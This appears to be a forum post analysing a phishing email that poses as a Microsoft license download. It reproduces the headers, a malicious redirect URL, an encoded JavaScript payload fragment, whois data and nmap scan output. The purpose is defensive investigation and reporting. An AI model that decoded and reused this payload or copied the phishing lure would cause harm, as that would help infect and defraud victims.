I received a phishing email spoofed from support@obnosis.com. Let's look into what it does? Delivered-To: lisakachold@obnosis.com Received: by 10.64.171.100 with SMTP id at4csp186530iec; Mon, 22 Oct 2012 08:41:01 -0700 (PDT) Received: by 10.182.31.43 with SMTP id x11mr6874576obh.68.1350920461345; Mon, 22 Oct 2012 08:41:01 -0700 (PDT) Return-Path: Received: from [2.135.176.89] ([2.135.176.89]) by mx.google.com with ESMTP id r10si10297370obv.209.2012.10.22.08.40.58; Mon, 22 Oct 2012 08:41:01 -0700 (PDT) Received-SPF: softfail (google.com: domain of transitioning SpencerLevoy@ezweb.ne.jp does not designate 2.135.176.89 as permitted sender) client-ip=2.135.176.89; Authentication-Results: mx.google.com; spf=softfail (google.com: domain of transitioning SpencerLevoy@ezweb.ne.jp does not designate 2.135.176.89 as permitted sender) smtp.mail=SpencerLevoy@ezweb.ne.jp Received: from by lsean.ezweb.ne.jp; Mon, 22 Oct 2012 10:41:00 +0300 Message-ID: Date: Mon, 22 Oct 2012 10:41:00 +0300 From: User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; rv:1.9.2.2) Gecko/20100316 Lightning/1.0b4 Thunderbird/2.0.0.23 MIME-Version: 1.0 To: lisakachold@obnosis.com Subject: Re: Fwd: Order N 8080409 Content-Type: multipart/alternative; boundary="------------000400070406090103060003" This is a multi-part message in MIME format. --------------000400070406090103060003 Content-Type: text/plain; charset=Windows-1252; format=flowed Content-Transfer-Encoding: 7bit Hello,You can download your Microsoft Windows License here -Microsoft Corporation --------------000400070406090103060003 Content-Type: text/html; charset=Windows-1252 Content-Transfer-Encoding: 7bit Hello,

You can download your Microsoft Windows License here -


Microsoft Corporation

--------------000400070406090103060003-- *http://private.detlef-kunz.de/page2.htm* Page2.htm: page15

Please wait a moment. You will be forwarded..

Internet Explorer or Mozilla Firefox compatible only


-end- Anyone want to crack the utf-8 in this ampersand encoded malicious javascript and tell us peice by peice what this does? Reference: http://dev.networkerror.org/utf8/ Tool: http://macchiato.com/unicode/convert.html Javascript Ampersand padding looks like: "5i$@4h$@5e$@29$@31$@2c$@2h$@2j$@a$@5i$@4h$@5e$@2a$@31$@5i$@4h$@5e$@29$@2j$@a$@55$@52$@20$@5i$@4h$@5e$@29$@31$@31$@5i$@4h$@5e$@2a$@21$@1c$@63$@50$@5b$@4j$@5h$@59$@51$@5a$@5g$@26$@58$@5b$@4j$@4h$@5g$@55$@5b$@5a$@31$@1e$@54$@5g$@5g$@5c$@2i$@27$@27$@52$@55$@50$@51$@58$@5b$@4j$@4h$@5f$@5g$@5e$@5b$@5b$@26$@5e$@5h$@2i$@2g$@28$@2g$@28$@27$@52$@5b$@5e$@5h$@59$@27$@58$@55$@5a$@57$@5f$@27$@4j$@5b$@58$@5h$@59$@5a$@26$@5c$@54$@5c$@1e$@2j$@65";h=2;s=" I am betting this is an Apple Quicktime embedded exploit: http://www.youtube.com/watch?v=C6e-shdTvsk http://private.detlef-kunz.de/ looks like a normal under construction page! http://whois.domaintools.com/detlef-kunz.de Immediate Action: Report to private.detlef-kunz.de technical contacts. [Tech-C] Type: ROLE Name: HostEurope GmbH Address: Welserstrasse 14 PostalCode: 51149 City: Köln CountryCode: DE Phone: +49 800 4678387 Fax: +49 1805 663233 Email: Changed: 2012-07-12T12:16:13+02:00 * Non-authoritative answer: Name: private.detlef-kunz.de Addresses: 2a01:488:42:1000:57e6:2f69:6d:740 87.230.47.105* Starting Nmap 6.01 ( http://nmap.org ) at 2012-10-22 09:58 US Mountain Standard Time NSE: Loaded 93 scripts for scanning. NSE: Script Pre-scanning. Initiating Ping Scan at 09:58 Scanning 87.230.47.105 [4 ports] Completed Ping Scan at 09:58, 1.11s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 09:58 Completed Parallel DNS resolution of 1 host. at 09:58, 0.36s elapsed Initiating SYN Stealth Scan at 09:58 Scanning vwp3866.webpack.hosteurope.de (87.230.47.105) [1000 ports] Discovered open port 21/tcp on 87.230.47.105 Discovered open port 143/tcp on 87.230.47.105 Discovered open port 110/tcp on 87.230.47.105 Discovered open port 587/tcp on 87.230.47.105 Discovered open port 993/tcp on 87.230.47.105 Discovered open port 3306/tcp on 87.230.47.105 Discovered open port 80/tcp on 87.230.47.105 Discovered open port 22/tcp on 87.230.47.105 Discovered open port 995/tcp on 87.230.47.105 Discovered open port 465/tcp on 87.230.47.105 Discovered open port 5666/tcp on 87.230.47.105 Completed SYN Stealth Scan at 09:58, 5.49s elapsed (1000 total ports) Initiating Service scan at 09:58 Analysis indicates a high probability that this is a hacked server. Anyone want to expand on this? -- (503) 754-4452 Android (623) 239-3392 Skype (623) 688-3392 Google Voice ** it-clowns.com Chief Clown -- (503) 754-4452 Android (623) 239-3392 Skype (623) 688-3392 Google Voice ** it-clowns.com Chief Clown